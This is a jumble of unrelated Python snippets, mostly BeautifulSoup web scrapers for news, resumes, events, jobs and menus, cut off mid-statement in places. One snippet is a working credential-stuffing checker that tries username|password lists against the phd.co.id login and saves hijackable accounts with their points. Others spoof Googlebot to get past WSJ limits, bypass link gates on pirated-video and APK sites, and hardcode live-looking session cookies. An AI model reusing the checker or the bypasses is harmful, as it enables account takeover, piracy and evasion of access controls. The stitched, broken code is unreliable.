def scrape_wsj(): time = datetime.datetime.now() print(f'Scraping from WSJ {time.time()}') session = requests.Session() session.headers = { "User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)" } url = "https://www.wsj.com/news/business?mod=hp_lista_strap" soup = Bs(session.get(url, verify=False).content, "html.parser") cadru_news1 = soup.find_all( "article", { "class": "WSJTheme--story--XB4V2mLz WSJTheme--story-padding--1gRL3tuf WSJTheme-" "-border-bottom--s4hYCt0s" }) cadru_news2 = soup.find_all( "article", { "class": "WSJTheme--story--XB4V2mLz WSJTheme--story-padding--1gRL3tuf WSJTheme--media-margin-bottom--1bIRFuDR" " WSJTheme--border-bottom--s4hYCt0s" }) for article in cadru_news1[1:]: try: title = article.find("h3").text paragraph = article.find("p").text url = article.find("a").get("href") img = article.find("img").get("src") new_head_wsj1 = Headline() new_head_wsj1.title = title new_head_wsj1.start_paragraph = paragraph new_head_wsj1.start_paragraph = Truncator( new_head_wsj1.start_paragraph).chars(200) new_head_wsj1.start_paragraph = "".join( new_head_wsj1.start_paragraph.rsplit(".")[:-1]) + "." new_head_wsj1.url = url new_head_wsj1.head_img = img new_head_wsj1.save() print(f"Headline created from WSJ: {new_head_wsj1.title}") except (ValidationError, IntegrityError, AttributeError, IndexError): continue for article2 in cadru_news2: try: title2 = article2.find("h3").text paragraph2 = article2.find("p").text url2 = article2.find("a").get("href") img2 = article2.find("img").get("src") new_head_wsj2 = Headline() new_head_wsj2.title = title2 new_head_wsj2.start_paragraph = paragraph2 new_head_wsj2.start_paragraph = Truncator( new_head_wsj2.start_paragraph).chars(200) new_head_wsj2.start_paragraph = "".join( new_head_wsj2.start_paragraph.rsplit(".")[:-1]) + "." new_head_wsj2.url = url2 new_head_wsj2.head_img = img2 new_head_wsj2.save() print(f"Headline created from WSJ: {new_head_wsj2.title}") except (ValidationError, IntegrityError, AttributeError, IndexError): continue
def get_features(self, ref): """Return features from resume data""" resume_page = requests.get(ref, headers=self.headers) soup = Bs(resume_page.text, 'html.parser') try: title = soup.find('title').extract().text except (TypeError, ValueError, AttributeError): title = 'null' try: gender = soup.find('span', { 'data-qa': 'resume-personal-gender' }).extract().text except (TypeError, ValueError, AttributeError): gender = 'null' try: city = soup.find('span', { 'data-qa': 'resume-personal-address' }).extract().text except (TypeError, ValueError, AttributeError): city = 'null' try: age = int( soup.find('span', { 'data-qa': 'resume-personal-age' }).extract().text[:2]) except (TypeError, ValueError, AttributeError): age = 0 try: salary = soup.find('span', { 'data-qa': 'resume-block-salary' }).extract().text salary = int(salary[0:3]) except (TypeError, ValueError, AttributeError): try: salary = soup.find('span', { 'data-qa': 'resume-block-salary' }).extract().text salary = int(salary[0:2]) except (TypeError, ValueError, AttributeError): salary = 0 try: experience_s = soup.find('span', { 'class': 'resume-block__title-text resume-block__title-text_sub' }).extract().text experience = str( experience_s)[12:re.search('лет', str(experience_s)).end() - 4] except (TypeError, ValueError, AttributeError): experience = 'null' try: last_job = soup.find('div', { 'class': 'resume-block__sub-title' }).extract().text except (TypeError, ValueError, AttributeError): last_job = 'null' return title, gender, city, age, salary, experience, last_job
def crawl(self): self.driver.get(self.url) self.driver.maximize_window() now = datetime.datetime.now() reg_date = now.strftime('%Y-%m-%d %H:%M:%S') wait = WebDriverWait(self.driver, 10).until( EC.presence_of_all_elements_located( (By.XPATH, '//*[@id="sub_wrapper"]/div/div[2]/section/div[1]/h3'))) self.driver.find_element_by_xpath('//*[@id="sYear"]').send_keys('2003') self.driver.find_element_by_xpath('//*[@id="sMonth"]').send_keys('01') self.driver.find_element_by_xpath('//*[@id="btn_search"]').click() self.driver.find_element_by_xpath('//*[@id="btn_last"]').click() page_length = self.driver.find_element_by_xpath( '//*[@id="pageLinkForm"]/strong').text pages = int(page_length) self.driver.find_element_by_xpath('//*[@id="btn_first"]').click() cnt = 2 for page in range(1, pages + 1): time.sleep(1) content_length = self.driver.find_elements_by_xpath( '//*[@id="sub_wrapper"]/div/div[2]/section/div[2]/div[3]/table/tbody/tr' ) for content in range(1, len(content_length) + 1): # url = self.driver.find_elements_by_xpath('//*[@id="gall_ul"]/li[{content}]/div/div[2]/div[2]/a[2]'.format(content=content)) # self.tempUrl = url[0].get_attribute('href') self.driver.find_element_by_xpath( '//*[@id="sub_wrapper"]/div/div[2]/section/div[2]/div[3]/table/tbody/tr[{content}]/td[3]/a' .format(content=content)).click() # content url 클릭 # url_text = self.driver.find_element_by_xpath('//*[@id="sub_content"]/div[1]/div[1]/div[{content}]/div/h2'.format(content=content)).text # self.driver.find_element_by_link_text(url_text).click() wait = WebDriverWait(self.driver, 10).until( EC.presence_of_all_elements_located( (By.XPATH, '//*[@id="pop_detailSche"]/h4'))) time.sleep(2) contents = self.driver.find_elements_by_xpath( '//*[@id="pop_detailSche"]') html = self.driver.page_source self.soup = Bs(html, 'html.parser') data = self.soup.select('#pop_detailSche') _dict['convention_name'] = 'iccjeju' _dict['contents'] = contents[0].text _dict['page_source'] = str(data) _dict['source_url'] = 'None' _dict['home_page'] = self.url _dict['reg_date'] = reg_date self.content_insert(_dict) self.driver.find_element_by_xpath( '//*[@id="pop_detailSche"]/div[3]/a').click() time.sleep(1) # self.driver.back() if cnt % 11 == 0: print('다음 페이지 이동') cnt = 2 self.driver.find_element_by_xpath( '//*[@id="btn_next"]').click() time.sleep(1) WebDriverWait(self.driver, 10).until( EC.presence_of_element_located( (By.XPATH, '//*[@id="sub_wrapper"]/div/div[2]/section/div[1]/h3' ))) else: cnt += 1 print('{cnt} 페이지 이동'.format(cnt=page)) self.driver.find_element_by_xpath( '//*[@id="pageLinkForm"]/a[{cnt}]'.format( cnt=cnt)).click() time.sleep(1) WebDriverWait(self.driver, 10).until( EC.presence_of_element_located( (By.XPATH, '//*[@id="sub_wrapper"]/div/div[2]/section/div[1]/h3' ))) '''wait = WebDriverWait(self.driver, 10).until(
from bs4 import BeautifulSoup as Bs page_html = str(urlopen('https://stepik.org/media/attachments/lesson/209719/2.html').read().decode('utf-8')) page_html_list = page_html.split('</code>') page_html_list_res = [] for i in page_html_list: if '<code>' in i: page_html_list_res.append(i[i.find('<code>') + len('<code>'):]) # print(page_html_list_res.sort()) # a = Counter(page_html_list_res) a_set = set(page_html_list_res) most_com = y = q = 0 most_list = [] while q != 3: for i in a_set: x = page_html_list_res.count(i) if x > y: y = x most_com = i most_list.append(most_com) a_set.discard(most_com) x = y = 0 q+=1 print(most_list) content_soup = Bs(page_html,'lxml') print(content_soup)
def bypass(url, judul): cc = 1 req = ses.get(url) bs = Bs(req.text, 'html.parser') link = bs.find('a', {'class': 'btn btn-success'})['href'] # print(link) req2 = ses.get(link) rg = re.findall(r'<frame src="(.*)">', req2.text)[0] # print(rg) blin = link.split('/')[2] req3 = ses.get(f"http://{blin}{rg}") bs2 = Bs(req3.text, 'html.parser') link2 = bs2.find('a', {'target': '_parent'})['href'] # print(link2) req4 = ses.get(f"http://{blin}{link2}") rg2 = re.findall(r'post\("(.*?)", {', req4.text)[0] # print(rg2) blin2 = req4.url.split('/')[2] # print(blin2) head = { 'Host': blin2, 'accept': '*/*', 'origin': f'http://{blin2}', 'x-requested-with': 'XMLHttpRequest', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36', 'content-type': 'application/x-www-form-urlencoded;charser=UTF-8', 'referer': link2, 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', } req5 = ses.post(f"http://{blin2}{rg2}", headers=head) # print(req5.text) try: rg3 = re.findall(r'https://layarkacaxxi.icu/f/(.*?)"', req5.text)[0] except: print("\n !Failed to bypass") tan = input( "[?] Anda ingin melanjutkannya ke website layarkaca21 (y/n) ") if tan.lower() == 'y': click.launch(info['title'][pil - 1][1]) else: sys.exit("okay bye bye:*") # print(rg3) req6 = ses.get(f'https://layarkacaxxi.icu/f/{rg3}') try: rg4 = re.findall(r"post\('(.*?)', ", req6.text)[0] except: raise Exception("\nDCMATakedown: Video tidak tersedia") # print(rg4) req7 = ses.post(f'https://layarkacaxxi.icu{rg4}') js = json.loads(req7.text) print("\n\t[ Resulution ]") for x in js['data']: print(f"{cc}. {x['label']}") cc += 1 lih = int(input("_> pilih: ")) if lih <= 0: print("index out of ranges") return True downld2(js['data'][lih - 1]['file'], f"{judul} {js['data'][lih-1]['label']}")
import requests from bs4 import BeautifulSoup as Bs import re import webbrowser from time import sleep, gmtime, strftime INDEX = 'XXXXXX' # nr indeksu tutaj ROK = '2018' WWW = 'http://www.cs.put.poznan.pl/amichalski/deklaratywne/index.html' text = 'Ocena niewpisana :(' while text == 'Ocena niewpisana :(': found = map( lambda x: x['href'], Bs(requests.get(WWW).text, 'html.parser').find_all(name='a', href=re.compile(ROK))) with open('check.txt', 'r') as file: content = file.read().splitlines() text = 'Ocena niewpisana :(' for f in found: if f not in content: txt_file = requests.get(f).text if INDEX in txt_file: i = txt_file.index(INDEX) text = "OCENA WPISANA: " + txt_file[i + 13:i + 16] break else: content.append(f) with open('check.txt', 'w') as file: file.write('\n'.join(content)) print(text, strftime("%Y-%m-%d %H:%M:%S", gmtime()))
def download(url,judul): print("#",re.findall(r'. (.*)',judul)[0]) req3=ses.get('https://an1.com'+url) rg=re.findall(r'href=(.*)><input',req3.text) if "bit.ly" in rg[0]: rq=requests.get(rg[0]).url rg=rq.split() if "files.an1.net" in rg[0]: link=rg[0] elif '.apk' in rg[0] or '.zip' in rg[0]: link=rg[0] elif "www.4sync.com" in rg[0]: req4=requests.get(rg[0]) bs3=Bs(req4.text,'html.parser') link=bs3.find('input',{'class':'jsDLink'})['value'] elif "racaty.net" in rg[0]: reqs=requests.get(rg[0]) bss=Bs(reqs.text,'html.parser') op=bss.find('input',{'name':'op'})['value'] id=bss.find('input',{'name':'id'})['value'] rep=requests.post(rg[0],data={'op':op,'id':id}) bss2=Bs(rep.text,'html.parser') link=bss2.find('a',{'id':'uniqueExpirylink'})['href'] else: bps=ses.get(rg[0]).url nya=input(f"[Maaf] link download {re.findall(r'https://(.*)/',bps)} saat ini belum kami support\n[?] Apakah anda ingin membuka link tersebut (y/n) ") if nya.lower() == 'y': click.launch(rg[0]) return True # print(info) print(f"{rg}\n") #Downloading file=re.findall(r'Download (.*) ',judul)[0] count=1 response=requests.get(link,stream=True) start=time.time() total_length=response.headers.get('content-length') with open(f'result/{file.replace("/",",")}','wb') as save: if total_length is None: print("\n[Warn] Download GAGAL") tan=input("[?] anda ingin melanjutkannya ke website android-1.com (y/n) ") if tan.lower() == 'y': click.launch('https://an1.com'+url) else: sys.exit("okay bye bye:*") else: dlw=0 total_length=int(total_length) cusi=512 for data in response.iter_content(chunk_size=cusi): durasi=time.time() - start if durasi == 0: durasi=0.1 ges=round((dlw/total_length)*100) dsiz=int(count*cusi) sped=int((dsiz/1024) / durasi) dlw+=len(data) save.write(data) done=int(15*dlw/total_length) print(end=f"\r\033[97m[\033[92m{'>'*done}\033[91m{'='*(15-done)}\033[97m] {ges}%, {sped} KB/s, {round(dsiz/(1024*1024), 2)} MB ",flush=True) count+=1 print("\n[OK] file saved in result\n")
def __init__(self, url): self.url = url self.db = database.Database('crawling_musinsa') # BS 사용 선언 res = rq.get(self.url) self.html = Bs(res.content, 'html.parser')
def crawl(self): self.driver.get(self.url.format(page=1)) self.driver.maximize_window() now = datetime.datetime.now() reg_date = now.strftime('%Y-%m-%d %H:%M:%S') # setting date #wait = WebDriverWait(self.driver, 10).until( # EC.presence_of_all_elements_located((By.XPATH, '//*[@id="content"]/div[1]/div[1]/h2'))) #self.driver.execute_script('document.getElementsByName("sdate")[0].removeAttribute("readonly")') #self.driver.execute_script('document.getElementsByName("edate")[0].removeAttribute("readonly")') #self.driver.find_element_by_xpath('//*[@id="sdate"]').clear() #self.driver.find_element_by_xpath('//*[@id="edate"]').clear() #self.driver.find_element_by_xpath('//*[@id="sdate"]').send_keys('2010-01-01') #self.driver.find_element_by_xpath('//*[@id="edate"]').send_keys('2020-01-30') #self.driver.find_element_by_xpath('//*[@id="listForm"]/fieldset/div[3]/input[2]').click() # go last page #WebDriverWait(self.driver, 10).until( # EC.element_to_be_clickable((By.XPATH, '//*[@id="content"]/div[2]/div[3]/ul/li[14]/a'))) try: self.driver.find_element_by_xpath( '//*[@id="content"]/div[2]/div[3]/ul/li[14]/a').click() page_length = self.driver.find_element_by_xpath( '//*[@id="content"]/div[2]/div[3]/ul/li/strong').text pages = int(page_length) except: a = self.driver.find_elements_by_xpath( '//*[@id="content"]/div[2]/div[3]/ul/li') pages_length = self.driver.find_element_by_xpath( '//*[@id="content"]/div[2]/div[3]/ul/li[{}]/a'.format( len(a) - 2)).text pages = int(pages_length) # go first page # self.driver.find_element_by_xpath('//*[@id="content"]/div[2]/div[3]/ul/li[1]/a').click() #cnt = 3 for page in range(1, pages + 1): #time.sleep(1) self.driver.get(self.url.format(page=page)) content_length = self.driver.find_elements_by_xpath( '//*[@id="content"]/div[2]/fieldset/table/tbody/tr') for content in range(1, len(content_length) + 1): print('{page} 페이지 {content} 게시글 크롤링중'.format(page=page, content=content)) url = self.driver.find_elements_by_xpath( '//*[@id="content"]/div[2]/fieldset/table/tbody/tr[{content}]/td[3]/a' .format(content=content)) self.tempUrl = url[0].get_attribute('href') time.sleep(1) #WebDriverWait(self.driver, 10).until( # EC.presence_of_element_located((By.XPATH, '//*[@id="content"]/div[2]/fieldset/table/tbody/tr[{content}]/td[3]/a'.format(content=content)))) try: self.driver.find_element( By.CSS_SELECTOR, '#content > div.schedule > fieldset > table > tbody > tr:nth-child({content}) > td.subject2 > a' .format(content=content)).click() WebDriverWait(self.driver, 2).until(EC.alert_is_present(), '잘못된 접근입니다') #self.driver.find_element_by_xpath( # '//*[@id="content"]/div[2]/fieldset/table/tbody/tr[{content}]/td[3]/a'.format(content=content)).click() # content url 클릭 # url_text = self.driver.find_element_by_xpath('//*[@id="sub_content"]/div[1]/div[1]/div[{content}]/div/h2'.format(content=content)).text # self.driver.find_element_by_link_text(url_text).click() #WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.XPATH, '//*[@id="content"]/div[2]/div'))) alert = self.driver.switch_to.alert alert.accept() print("alert accepted") except TimeoutException: contents = self.driver.find_elements_by_xpath( '//*[@id="content"]/div[2]/div') html = self.driver.page_source self.soup = Bs(html, 'html.parser') data = self.soup.select('#content > div.schedule > div') _dict['convention_name'] = 'kintex' _dict['contents'] = contents[0].text _dict['page_source'] = str(data) _dict['source_url'] = self.tempUrl _dict['home_page'] = self.url _dict['reg_date'] = reg_date self.content_insert(_dict) #self.driver.find_element_by_xpath('//*[@id="pop_detailSche"]/div[3]/a').click() self.driver.back() time.sleep(1) '''if cnt % 8 == 0: print('다음 페이지 이동') cnt = 3 self.driver.find_element_by_xpath('//*[@id="content"]/div[2]/div[2]/ul/li[8]/a').click() time.sleep(1) WebDriverWait(self.driver, 10).until( EC.presence_of_element_located((By.XPATH, '//*[@id="content"]/div[1]/div[1]/h2'))) else: cnt += 1 print('{cnt} 페이지 이동'.format(cnt=page)) self.driver.find_element_by_xpath( '//*[@id="content"]/div[2]/div[2]/ul/li[{cnt}]/a'.format(cnt=cnt)).click() time.sleep(1) WebDriverWait(self.driver, 10).until( EC.presence_of_element_located((By.XPATH, '//*[@id="content"]/div[1]/div[1]/h2')))''' '''wait = WebDriverWait(self.driver, 10).until(
def extract_profile(raw_html): parser = Bs(raw_html, 'html.parser') return profile
def fetch_content(url): print(f'\nDownloading from {url}\n') page = requests.get(url) soup = Bs(page.content, 'html.parser') return soup
import requests as Rq from bs4 import BeautifulSoup as Bs link = 'http://www.pfl.unicamp.br/Rest/view/site/cardapio.php' page = Rq.get(link) soup = Bs(page.content, 'html.parser', from_encoding='iso-8859-1') soup = Bs(page.content, 'html.parser') def formatInput(text): text = text.replace('\n', '') text = text.replace('\r', '') text = text.replace(': ', ':') text = text.replace(' - ', '-') text = text.strip() return text html = [] html.append(formatInput(soup.find_all('tr')[0].getText())) for i in range(4, 11): html.append(formatInput(soup.find_all('tr')[i].getText())) print('\n\n') print('{:^50s}'.format(html[0].split('-')[0].upper())) print() print('{:^50s}'.format(html[0].split('-')[1])) print('-'*57) broke = []
def get_pupils_with_soup(self): soup = Bs(self.page.text, 'html.parser') s = soup.find(class_="total-users").text int_list = [str(s) for s in s if s.isdigit()] return int("".join(int_list))
def __init__(self, url): self.page = requests.get(url) self.soup = Bs(self.page.text, 'html.parser')
def snoopHTML(self, fpath): """ Generates data structure for given file, describing it's HTML elements that have and associated style. NOTE: Line numbers are sometimes inaccurate. :param fpath: str :return: """ self._HTML_file_styles[fpath] = [] file = open(fpath).read() file_lines = file.split('\n') soup = Bs(file, 'html.parser') tags = soup.find_all() for tag in tags: styles = { 'element': '', 'class': [], 'id': [], 'line_no': 0, 'tag': '' } if tag.has_attr('class'): _class = tag['class'] styles['class'].append(_class) elif tag.has_attr('id'): _id = tag['id'] styles['id'].append(_id) # get open tag of element styles['element'] = str(tag).strip().split('\n')[0] # get tag styles['tag'] = tag.name # if has style if len(styles['class']) != 0 or len(styles['id']) != 0: self._HTML_file_styles[fpath].append(styles) # clean up classes clean_classes = [] for cgroup in styles['class']: for cname in cgroup: clean_classes.append('.' + cname) # clean up ids clean_ids = [] for iname in styles['id']: clean_ids.append('#' + iname) styles['class'] = clean_classes styles['id'] = clean_ids # get line number in file for line in enumerate(file_lines): line_no = line[0] + 1 rline = str(line[1].strip()) opTag = '<' + styles['tag'] # check if matched tag on class if len(styles['class']) != 0: if opTag in rline and styles['class'][0][1:] in rline: styles['line_no'] = line_no # check if matched tag on id elif len(styles['id']) != 0: if opTag in rline and styles['id'][0][1:] in rline: styles['line_no'] = line_no
def scorecard_generator(info: CricketInfo, page: str): soup = Bs(markup=get(url=page).text, features='html.parser') for scorecard in soup.find_all('a', {'data-hover': 'Scorecard'}): yield f'{info.HomeCenter}{scorecard.attrs["href"]}'
def main(): live = [] os.system('clear') print(C + 'Subscribe YT' + W + ' Gua Dlu Su !' + C + ' :V') sleep(1.5) os.system( 'xdg-open https://www.youtube.com/channel/UCzsADl8XRJeZXJ6CKZLX5KQ') os.system('clear') banner() print print try: empas = raw_input('' + C + 'Masukkan File' + W + ' (' + H + ' Ex :' + C + ' Empas.txt' + W + ') : ') print print('' + C + '-------------- ' + W + 'Starting' + C + ' --------------') print a = open(empas).readlines() for x in a: br = Browser() cokie = cookielib.LWPCookieJar() br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_cookiejar(cokie) br.addheaders = [ ("Origin", "https://www.phd.co.id"), ("User-Agent", "Mozilla/5.0 (Linux; Android 5.1.1; AFTT Build/LVY48F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/49.0.2623.10" ), ("Referer", "https://www.phd.co.id/en/users/login/1"), ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" ) ] us = x.strip().split('|')[0] ps = x.strip().split('|')[1] url = 'https://www.phd.co.id/en/users/login/1' br.open(url) br.select_form(nr=0) br.form['username'] = str(us) br.form['password'] = str(ps) a = live if br.submit().geturl( ) == 'https://www.phd.co.id/en/users/welcome': x = br.open('https://www.phd.co.id/en/accounts').read() y = Bs(x, 'html.parser') z = y.find('li', {'class': 'owner-poin'}).text print('' + H + '[' + W + 'LIVE' + H + '] ' + W + 'USER : '******' | ' + W + 'PASS : '******' POIN : ' + str(z[6:])) a.append('[ LIVE ] [ USER : '******' | PASS : '******' ] [ POIN : ' + str(z[6:]) + ' ] Checked On https://github.com/Fukur0-3XP/PHD') else: print('' + A + '[' + W + 'ERROR' + A + '] ' + W + 'USER : '******' | ' + W + 'PASS : '******'\n'.join(live)) c = open('Live.txt', 'w') c.write(b) print print('' + C + '----------- ' + W + 'Selesai & Hasil' + C + ' -----------') print print(W + 'Hasil Live : ' + C + str(len(live))) print(W + 'Hasil Tersimpan Di File "' + C + 'Live.txt' + W + '"') print c.close() except IOError: print print(M + 'File Tidak Di Temukan !') print
def pars(link): response = requests.get(link) return Bs(response.text, "html.parser")
html_doc = """ <html><head><title>Imperial</title></head> <body> <p class="title"><b>Atletica Imperial</b></p> <p class="story">Atletica de S.I criada em 2017. Temos: <a href="www.imperial.com/blusas" class="prod" id="link1">Blusas</a>, <a href="www.imperial.com/canecas" class="prod" id="link2">Canecas</a> e <a href="www.imperial.com/bones" class="prod" id="link3">Bones</a>; Filie-se.</p> <p class="story">...</p> """ soup = Bs(html_doc, 'html.parser') print(soup.prettify()) print(soup.title) print(soup.title.name) print(soup.title.string) print(soup.title.parent.name) print(soup.p) print(soup.p['class'])
tmp_rel_a, tmp_rel_b, tmp_rel_c, tmp_img_a, tmp_img_b, tmp_img_c = setOfRule( U, V, ids, ImgTraining, HodTraining) ids += 1 rel_a = np.vstack((rel_a, tmp_rel_a)) rel_b = np.vstack((rel_b, tmp_rel_b)) rel_c = np.vstack((rel_c, tmp_rel_c)) img_a = np.vstack((img_a, tmp_img_a)) img_b = np.vstack((img_b, tmp_img_b)) img_c = np.vstack((img_c, tmp_img_c)) return rel_a, rel_b, rel_c, img_a, img_b, img_c if __name__ == "__main__": with open('config.xml', 'r') as f: data = f.read() Bs_data = Bs(data, 'xml') c = int(Bs_data.c.contents[0]) folderImg = os.path.join('Data', os.path.join('Training Data', 'gray')) folderHod = os.path.join('Data', os.path.join('Training Data', 'hod')) HodTraining = readHodImg(folderHod) / 255 ImgTraining = readDataImg(folderImg) / 255 folderU = 'U' folderV = 'V' rel_a, rel_b, rel_c, img_a, img_b, img_c = readUAndV( folderU, folderV, ImgTraining, HodTraining, c) #final_rel_a=np.empty((0,1)) #final_img_a=np.empty((0,1)) #final_rel_b=np.empty((0,1)) #final_img_b=np.empty((0,1)) #final_rel_c=np.empty((0,1)) #final_img_c=np.empty((0,1))
def parse_bs(texto: str) -> Bs: """Transformar texto em objeto beautiful soap.""" return Bs(texto, 'html.parser')
def getAllForms(self): """hedef sayfanın html dosyasında form tagları aranır""" soup = Bs(requests.get(self.url).content, "html.parser") return soup.find_all("form")
import requests from bs4 import BeautifulSoup as Bs import json URL_TEMPLATE = "https://www.work.ua/ru/jobs-odesa/?page=2" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'cookie': 'plastikovye-vospominaniya=1477.11; _ga=GA1.2.324220759.1581889231; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6ImFadlVRWnY3aTBtTFhyUFI3ZmtoMEE9PSIsInZhbHVlIjoiNzhSK0R2eGdOMVBJTE5BWTBlOEt4ZUJIRmEyN2ZTQzdYODVhN3pGZUVnbm5OaStaSDVMK2V0Y0trOGlpUGRwaXVDb0FPb1wvRHNiZmxITXpFQituY0VKXC9ySXM1M3o2YmFTYTRRV2c5VzZaSEltZW1DZUFXQ252bDdwSFU1R2NFWStmYzgzaXpoVmw4M3dLVTc5RXljS2JDWWJuMXZ6VkRqYTNWdWprZFBYNVN0Zm9BYkdvRFwvUk5LUEsybU5zdW9nIiwibWFjIjoiNzE2N2YzYjBmNTc1YWUzZjA0ZWM5ZjIxMGExNzk2MTJlMjM3ODY2MGE5ZDNhMDY5ODFmZWJhNzdlMzlkZWRmYyJ9; __atssc=vk%3B5; _gid=GA1.2.999237229.1593986215; cf_chl_1=f785ed8de6ea7ef; __atuvc=48%7C25%2C45%7C26%2C9%7C27%2C32%7C28%2C6%7C29; XSRF-TOKEN=eyJpdiI6IlwvcGRWTnJJbzEzeFh5T0Y4WE01UkR3PT0iLCJ2YWx1ZSI6IlM3MWxQVElWOWt5QjM4ZGVjVFJhNDNZeENXeDJVZDd0cWpPbld3YjkwR0g2WlJqNnorQ1NaZ1lENngxWkdqT1oiLCJtYWMiOiJhMGI2NGIzMDExYWNjMDA3MTNmODhhZTIzNTcxZjU3ZWIzZjBiNjhmY2YyNjA0MTcwZjYxYzZjOTdmNmQ1ZGJmIn0%3D; laravel_session=eyJpdiI6ImhIbkVMZ2U4aTJNaVZwcnhkZHVqK1E9PSIsInZhbHVlIjoibTNNVlpnSFo3T0RJMTRnbGQrN2t3U2JVeFZ3bHVYUVdDNTVSYXZVa2FPSjRqVldJTUdjYThYQ0dhclBQWE1oSyIsIm1hYyI6ImVkMTc3NzkwMDk3NGRlYWQ1NjMwYWVjNjc1ODAzMjI2MzE2NmU1MTliOTkxMDdmNDA3ZjU4Zjc5MGMxYjI5MjIifQ%3D%3D' } r = requests.get(URL_TEMPLATE, headers=headers) with open('test.html', 'wb') as output_file: output_file.write(r.text.encode('utf-8')) soup = Bs(r.text, "html.parser") vacancies_names = soup.find_all( 'div', class_='card card-hover card-visited wordwrap job-link js-hot-block') vacancies_info = soup.find_all( 'p', class_='overflow text-muted add-top-sm add-bottom') _vacancies = zip(vacancies_names, vacancies_info) vacancies = {vacancies_[0]: vacancies_[1] for vacancies_ in _vacancies} for info in vacancies.items(): print('+++' * 10) print(info[0].h2.a['title']) print('https://www.work.ua' + info[0].a['href']) print(info[1].text) print('+++' * 10) _vacancies = zip(vacancies_names, vacancies_info) vacancies = {